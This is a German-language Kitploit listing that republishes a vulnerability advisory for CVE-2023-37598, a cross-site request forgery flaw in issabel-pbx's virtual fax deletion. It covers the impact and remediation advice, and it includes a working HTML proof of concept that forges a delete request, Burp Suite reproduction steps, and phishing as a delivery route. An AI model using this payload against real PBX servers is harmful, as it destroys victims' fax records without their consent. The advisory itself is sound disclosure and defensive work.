Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-37598 — In issabel-pbx v4.0.0-6 besteht eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) innerhalb der Verwaltung virtueller Faxe. | Kitploit
Tools/GitHubGitHub/sahiloj/cve-2023-37598
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubsahiloj/cve-2023-37598

CVE-2023-37598

In issabel-pbx v4.0.0-6 besteht eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) innerhalb der Verwaltung virtueller Faxe.

Repository anzeigen
11vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-37598 — issabel-pbx 4.0.0-6: Site-übergreifende Anfragefälschung (CSRF)

Übersicht

CVE-ID: CVE-2023-37598
Schwachstellentyp: Site-übergreifende Anfragefälschung (CSRF)
Betroffenes Produkt: issabel-pbx v4.0.0-6
Schweregrad: Mittel
Entdeckt von: Sahil Ojha
Offenlegungsdatum: 10.07.2023
Hersteller-Webseite: https://www.issabel.org/
Software-Repository: https://github.com/IssabelFoundation/issabelPBX
Getestet auf: Windows


Beschreibung

In issabel-pbx v4.0.0-6 besteht eine Site-übergreifende Anfragefälschung (CSRF)-Schwachstelle in der Verwaltungsfunktion für virtuelle Faxe. Die Anwendung implementiert keinen CSRF-Schutz (z. B. Anti-CSRF-Token oder SameSite-Cookie-Attribute) für die Löschaktion von virtuellen Faxeinträgen.

Dies ermöglicht es einem entfernten, nicht authentifizierten Angreifer, eine schädliche HTML-Seite zu erstellen, die – wenn sie von einem authentifizierten Administrator oder Benutzer besucht wird – im Namen des Opfers eine gefälschte HTTP-Anfrage an die Anwendung sendet. Die gefälschte Anfrage bewirkt die Löschung von virtuellen Faxdatensätzen ohne Wissen oder Zustimmung des Opfers, was zu Datenverlust und Unterbrechung der Faxdienste führt.

Was ist CSRF?

Site-übergreifende Anfragefälschung (CSRF) ist ein Angriff, bei dem der Browser eines Opfers dazu gebracht wird, eine authentifizierte Anfrage an eine Webanwendung zu senden, ohne dass der Benutzer dies beabsichtigt. Da der Browser automatisch Sitzungscookies mit jeder Anfrage mitsendet, kann der Server eine legitime Anfrage nicht von einer gefälschten unterscheiden, wenn kein CSRF-Token vorhanden ist.


Auswirkungen

  • Datenverlust: Ein Angreifer kann virtuelle Faxeinträge eines beliebigen Benutzers löschen und Faxdaten dauerhaft unzugänglich machen.
  • Unberechtigte Statusänderung: Administrative Faxdatensätze können stillschweigend entfernt werden, ohne dass der legitime Benutzer davon etwas mitbekommt.
  • Keine Authentifizierung für den Angreifer erforderlich: Der Angreifer benötigt keine gültigen Anmeldedaten – nur das Opfer (das bereits eingeloggt ist) muss die vom Angreifer kontrollierte Seite besuchen.

Betroffene Komponente

ParameterWert

Nachweis (Proof of Concept, PoC)

Die folgende HTML-Datei sendet, wenn sie von einem authentifizierten issabel-pbx-Benutzer geöffnet wird, automatisch eine gefälschte POST-Anfrage, die das virtuelle Fax mit id_fax=1 löscht.

Datei: CSRF exploit.html

root@kitploit:~
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://{Issabel IP}/index.php?menu=faxnew&action=view&id=1" method="POST">
      <input type="hidden" name="delete" value="Delete" />
      <input type="hidden" name="id_fax" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Hinweis: Ersetzen Sie {Issabel IP} durch die IP-Adresse oder den Hostnamen des Zielservers. Der Wert von id_fax kann geändert werden, um einen beliebigen virtuellen Faxdatensatz anhand seiner ID anzugreifen.


Reproduktionsschritte

  1. Melden Sie sich im Issabel PBX-Admin-Panel an und navigieren Sie zur Seite „Virtuelles Fax“:

    root@kitploit:~
    https://{Issabel IP}/index.php?menu=faxnew&action=view&id=1
    

    Schritt 1 – Issabel Virtual Fax-Seite

  2. Fangen Sie die Lösch-Anfrage mit Burp Suite Proxy ab. Versuchen Sie, einen virtuellen Faxeintrag zu löschen, fangen Sie die Anfrage ab, klicken Sie mit der rechten Maustaste darauf und gehen Sie zu Engagement Tools → Generate CSRF PoC.

    Schritt 2 – CSRF PoC in Burp Suite generieren

  3. Speichern Sie den generierten CSRF-Exploit als HTML-Datei (siehe PoC oben).

  4. Liefern Sie den Exploit an einen Benutzer, der bereits in der Issabel-Anwendung angemeldet ist (z. B. über eine Phishing-E-Mail oder einen schädlichen Link). Wenn das Opfer die Seite öffnet und auf „Submit request“ klickt, wird der virtuelle Faxeintrag ohne weitere Interaktion gelöscht.

    Schritt 3 – CSRF-Exploit-HTML im Browser gerendert

    Schritt 4 – Virtuelles Fax aus dem Admin-Dashboard gelöscht


Angriffsszenario

Ein Angreifer hostet die schädliche HTML-Datei auf einem externen Server oder bettet sie in eine E-Mail ein. Wenn ein authentifizierter Issabel PBX-Administrator diese Seite in derselben Browsersitzung öffnet, sendet der Browser automatisch die gefälschte POST-Anfrage – einschließlich des gültigen Sitzungscookies – an den Issabel-Server. Der Server verarbeitet die Anfrage als legitim und löscht den anvisierten virtuellen Faxdatensatz. Das Opfer erhält keine Warnung und bemerkt die Löschung möglicherweise erst, wenn es die Faxliste manuell überprüft.


Abhilfe

Um diese Schwachstelle zu beheben, sollte der Hersteller eine oder mehrere der folgenden Maßnahmen implementieren:

  1. Anti-CSRF-Token: Fügen Sie in allen zustandsändernden Formularen ein eindeutiges, unvorhersehbares, pro Sitzung gültiges Token ein und überprüfen Sie es serverseitig, bevor die Anfrage verarbeitet wird.
  2. SameSite-Cookie-Attribut: Setzen Sie das Sitzungscookie mit SameSite=Strict oder SameSite=Lax, um zu verhindern, dass der Browser es bei ursprungsübergreifenden Anfragen mitsendet.
  3. Benutzerdefinierte Anforderungsheader: Verlangen Sie für alle sensiblen Vorgänge einen benutzerdefinierten HTTP-Header (z. B. X-Requested-With: XMLHttpRequest) und überprüfen Sie ihn serverseitig.
  4. Erneute Authentifizierung für zerstörerische Aktionen: Fordern Sie Benutzer auf, ihr Passwort erneut einzugeben oder ihre Identität zu bestätigen, bevor sie irreversible Vorgänge wie Löschungen durchführen.

Referenzen

  • NVD – CVE-2023-37598
  • OWASP – Cross-Site Request Forgery (CSRF)
  • Issabel PBX GitHub Repository
  • Issabel Official Website
Tool herunterladen
Anwendungissabel-pbx
Version4.0.0-6
Angreifbare URL/index.php?menu=faxnew&action=view&id=<ID>
Angreifbare Aktiondelete (POST-Parameter)
Fehlender SchutzCSRF-Token / SameSite-Cookie-Attribut